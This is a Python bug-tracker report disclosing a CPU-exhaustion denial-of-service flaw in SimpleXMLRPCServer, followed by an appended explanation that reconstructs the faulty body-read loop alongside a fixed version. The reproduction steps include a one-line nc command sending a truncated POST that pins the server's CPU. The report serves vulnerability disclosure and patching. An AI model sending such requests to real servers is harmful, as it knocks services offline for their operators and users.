New submission from Jan Lieskovsky <ian...@seznam.cz>:

A denial of service flaw was found in the way the Simple XML-RPC Server module of Python processed client connections that were closed before the complete request body had been received. A remote attacker could use this flaw to cause a Python Simple XML-RPC based server process to consume an excessive amount of CPU.
Credit: Issue reported by Daniel Callaghan

References:
[1] https://bugzilla.redhat.com/show_bug.cgi?id=789790

Steps to reproduce:
------------------
A) for v3.2.2 version:
1) start server:
   cat s.py
   #!/usr/local/bin/python3
   from xmlrpc.server import SimpleXMLRPCServer
   # listen on loopback only; no functions registered, the bug is in request reading
   server = SimpleXMLRPCServer(('127.0.0.1', 12345))
   server.serve_forever()
2) # top
3) issue request from client:
   echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

   Return to the 'top' screen and see how CPU consumption on the particular host quickly moves to 100%.

B) for v2.7.2 version:
1) start server:
   cat s.py
   #!/usr/bin/python
   from SimpleXMLRPCServer import SimpleXMLRPCServer
   # listen on loopback only; no functions registered, the bug is in request reading
   server = SimpleXMLRPCServer(('127.0.0.1', 12345))
   server.serve_forever()

Steps 2) and 3) for v2.7.2 version are identical to those for v3.2.2 version.

----------
components: Library (Lib)
messages: 153267
nosy: iankko
priority: normal
severity: normal
status: open
title: Python v2.7.2 / v3.2.2 (SimpleXMLRPCServer): DoS (excessive CPU usage) by processing malformed XMLRPC / HTTP POST request
type: security
versions: Python 2.7, Python 3.2

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue14001>
_______________________________________
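The report above describes the symptom (100% CPU after a truncated POST) but not the mechanism. The following is an added example, not code from the report or from CPython itself: a reconstruction of the chunked body-read loop in the XML-RPC request handler, written from memory of its shape rather than copied, together with a hardened variant. The vulnerable loop subtracts the length of each read from the remaining byte count; once the peer has closed the socket, read() returns an empty string, the remaining count never reaches zero, and the loop spins. The hardened loop treats an empty read as EOF. The request bytes, the `split_request` helper, the `MAX_CHUNK_SIZE` cap and the `max_iterations` guard (used only so the vulnerable version terminates in a demo) are all this example's own assumptions.

```python
import io

# Constructed sample: the request from the report. Content-Length claims 100
# bytes, but the client sends 7 body bytes and then closes the connection.
TRUNCATED_POST = (b"POST /RPC2 HTTP/1.0\r\n"
                  b"Content-Length: 100\r\n"
                  b"\r\n"
                  b"lol bye")

# Upper bound on a single read; assumed here, mirrors the idea of capping
# chunk size so a huge Content-Length cannot force one giant allocation.
MAX_CHUNK_SIZE = 10 * 1024 * 1024


def split_request(raw):
    """Return (content_length, body_stream) for a raw HTTP request.

    The BytesIO stands in for the socket's rfile: once its 7 bytes are
    consumed, every further read() returns b"", exactly like a closed socket.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    content_length = 0
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            content_length = int(value.strip())
    return content_length, io.BytesIO(body)


def read_body_vulnerable(rfile, content_length, max_iterations=1000):
    """Reconstruction of the spinning loop: no EOF check.

    Returns the body if it completes, or None when the iteration guard trips.
    Without the guard (the real handler has none) this never returns once the
    peer closes early, because an empty read leaves size_remaining unchanged.
    """
    chunks = []
    size_remaining = content_length
    iterations = 0
    while size_remaining:
        if iterations >= max_iterations:
            return None  # demo-only guard; the real server keeps spinning
        chunk_size = min(size_remaining, MAX_CHUNK_SIZE)
        chunk = rfile.read(chunk_size)
        chunks.append(chunk)
        size_remaining -= len(chunk)  # 0 on EOF, so the loop never ends
        iterations += 1
    return b"".join(chunks)


def read_body_fixed(rfile, content_length):
    """Hardened loop: an empty read means the peer is gone, so stop.

    Returns whatever was received; the caller compares len() against
    content_length and rejects the request if the body is short.
    """
    chunks = []
    size_remaining = content_length
    while size_remaining:
        chunk_size = min(size_remaining, MAX_CHUNK_SIZE)
        chunk = rfile.read(chunk_size)
        if not chunk:
            break  # connection closed before Content-Length bytes arrived
        chunks.append(chunk)
        size_remaining -= len(chunk)
    return b"".join(chunks)


def demo_vulnerable():
    """Feed the truncated request to the vulnerable loop (returns None)."""
    content_length, body = split_request(TRUNCATED_POST)
    return read_body_vulnerable(body, content_length)


def demo_fixed():
    """Feed the truncated request to the fixed loop (returns the 7 bytes)."""
    content_length, body = split_request(TRUNCATED_POST)
    return read_body_fixed(body, content_length)


if __name__ == "__main__":
    print("vulnerable loop result:", demo_vulnerable())
    body = demo_fixed()
    print("fixed loop result:", body, "complete:",
          len(body) == split_request(TRUNCATED_POST)[0])
```

The fixed loop alone only stops the spin; a server should additionally refuse to dispatch a body shorter than the declared Content-Length (respond with an error and close), since the partial bytes are not a well-formed XML-RPC call.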